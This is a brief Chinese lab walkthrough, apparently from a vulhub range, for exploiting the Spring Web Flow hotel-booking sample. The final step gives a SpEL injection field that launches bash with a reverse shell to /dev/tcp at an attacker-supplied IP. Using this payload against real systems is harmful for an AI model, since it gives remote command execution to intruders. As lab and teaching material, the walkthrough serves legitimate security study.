1、启动靶场
docker-compose up -d
等待环境启动后,访问`http://your-ip:8080`,将看到一个酒店预订的页面,这是spring-webflow官方给的简单示例。
2、首先访问`http://your-ip:8080/login`,
用页面左边给出的任意一个账号/密码登录系统:
3、预定一个酒店
4、对confirm抓包
5、添加一个字段
(也就是反弹shell的POC):
_(new+java.lang.ProcessBuilder("bash","-c","bash+-i>%26+/dev/tcp/你的IP/21+0>%261")).start()=vulhub